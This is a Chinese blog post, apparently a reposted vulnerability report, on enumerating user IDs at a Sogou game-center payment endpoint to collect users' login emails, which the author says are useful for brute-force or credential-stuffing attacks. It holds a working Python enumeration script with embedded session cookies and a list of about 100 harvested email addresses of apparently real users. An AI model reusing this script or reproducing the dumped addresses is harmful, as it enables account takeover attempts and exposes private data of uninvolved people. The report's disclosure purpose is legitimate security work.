网络安全

搜狗6000万用户登录邮箱可通过uid遍历

1.sogou游戏中心站点http://wan.sogou.com/p/index.do

2.充值处,可以为他人充值

该处可以通过遍历uid来获取其他用户的邮箱信息,用作暴力破解或者撞裤

通过测试uid,有6000万+用户

POST请求包如下:

搜狗6000万用户登录邮箱可通过uid遍历

 

附上Py脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
code 区域
if __name__ == '__main__':
for i in range (1000):
params=urllib.urlencode({'gid':'233','sid':'21','paygate':'-331','amount':'10','uid':i})
headers={
"Cookie":"IPLOC=CN2100; SUID=63043D777D23900A000000005552F7EA; SUV=00D766AC773D04635552F7EB7AADD090; usid=63043D7730890E0A000000005563D38A; CNZZDATA1255303155=1173610824-1438220021-%7C1438220021; swfLayer=1; ppinf=5|1438220959|1439430559|Y2xpZW50aWQ6NDoxMTAwfGNydDoxMDoxNDM4MjIwOTU5fHJlZm5pY2s6MDp8dHJ1c3Q6MToxfHVzZXJpZDoxOTpkb250c2F5aGVoZUAxNjMuY29tfHVuaXFuYW1lOjk6MTEyMzQyMzExfA; pprdig=pgpiRH6X-cilVdO8pLT6V2s5gcos7yfRdrabmaNieW1v0MJawaw-M3qUMkNr_hovhIZZ0ZeQsD7yPnehRoZrb5BJA8bY5BDKs1awJwVDqhlPsLplQrsWSXB3hrUYGXTdKKhCgV-a3Pwi6qeSlGF6iJ4lD_qeDE8PifX6cA1GZDA; email=**********; SSUID=BEF747DFDC68FA329D3F93994957BE5A; ppmdig=1438220960000000dd5308bce1c345c0d36e8be0ae55856e; hostid=40731406; JSESSIONID=aaaiTZSNM3yNBghhKPC7u",
"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8","Connection":"keep-alive",
"Pragma":"no-cache","Cache-Control":"no-cache","Accept":"*/*","Accept-Language":"zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3","Accept-Encoding":"gzip, deflate"
}

conn = httplib.HTTPConnection('wan.sogou.com','80',True,2)
conn.request(method="POST",url="/payconfirm.do",body=params,headers=headers)
response = conn.getresponse()
body = response.read()
usermail = re.findall(r'(?<= id="dUid" class="font-black">).*?(?=

)'
,body)
print usermail[0]

漏洞证明:

频率不要太快,跑了100个测试下。
zhaozhe112@sohu.com
zhaozhe112234@sogou.com
bellwill@sogou.com
gaodingsogou@sogou.com
burst@sogou.com
bellscape@sogou.com
testxiuew@sogou.com
zhaozhe1123x@sogou.com
hotfall@sohu.com
xn-test1@sogou.com
loveystar@chinaren.com
liuxu-sogou@sogou.com
rainbow8416@sogou.com
liuxv87@sogou.com
caodanaxx1@sogou.com
wx2011916105724@sogou.com
burst009x@sogou.com
burst00786@sogou.com
gg123xo@sogou.com
txieiwowe@sogou.com
sonicfeng1981@sohu.com
burstx980@sogou.com
xn-test2@sogou.com
xianghuiru108@sohu.com
hotfall@sogou.com
caodanx@sogou.com
zhongshenxx@sogou.com
a123xy@sogou.com
axx98xl@sogou.com
axx1238-@sogou.com
xfew9874@sogou.com
stdio1@sohu.com
xn-test3@sogou.com
xn-test4@sogou.com
burst123x@sogou.com
xianghuiru5678@sogou.com
bellzhong123@sogou.com
lx187654@sogou.com
zhaozhezheng@sogou.com
xn-test5@sogou.com
sogou_open@sogou.com
a1520008935@sogou.com
xn-test6@sogou.com
xn-test7@sogou.com
a649577224@sogou.com
rty5664@sogou.com
lilin199211@sogou.com
xuexiaozhou123@sogou.com
et1130179276@sogou.com
hjhghgnb@sogou.com
wsnm1336149162@sogou.com
zjj825827@sohu.com
ww392220261@sogou.com
ljc34522748@sogou.com
w1611310734@sogou.com
sw1579483698@sogou.com
t6r65556653@sogou.com
ggf1228801615@sogou.com
w19920622@sogou.com
qiuchaojn@sogou.com
ij919440687@sogou.com
lxtext@sogou.com
a1107937270@sogou.com
dhfudshgufdg@sogou.com
qwertyuiop147236@sogou.com
qw06123456@sogou.com
yh5445456@sogou.com
jixueli@sogou.com
wss188@sogou.com
h1256508348@sogou.com
jasq@sogou.com
s994256021@sogou.com
zxc1693231929@sogou.com
u1403233627@sogou.com
qweas1073909212@sogou.com
a1491255961@sogou.com
dongdan114@sogou.com
liminhe@sogou.com
xt1230.123@sogou.com
yhhggy@sogou.com
laotian_2000_2000@chinaren.com
hgfhvghggvf@sogou.com
kuanglianpu1@sogou.com
as625673784@sogou.com
q17992140714@sogou.com
gk1094918561@sogou.com
xiaozhuge2@sogou.com
jim.@sogou.com
wangyan_works@sogou.com
q616066451@sogou.com
ffgklpglper@sogou.com
香百合1@focus.cn
a422193476@sogou.com
hgfjdsawu@sogou.com
jvb132@sogou.com
f1591268761@sogou.com
qrwerwt3465hrt@sogou.com
a1346927986482@sogou.com
gulang.com@sogou.com
zxvgbgf@sogou.com
zhi787747702@sogou.com
a1554567397@sogou.com
wm798200@focus.cn
abc-.@sogou.com
zhou1786962732@sogou.com

(0)
Loading收藏(0)

本文由 老D博客 作者:老D 发表,转载请注明来源!

SS推荐

热评文章

发表评论

*

评论: 2 条评论,访客:2 条,博主:0 条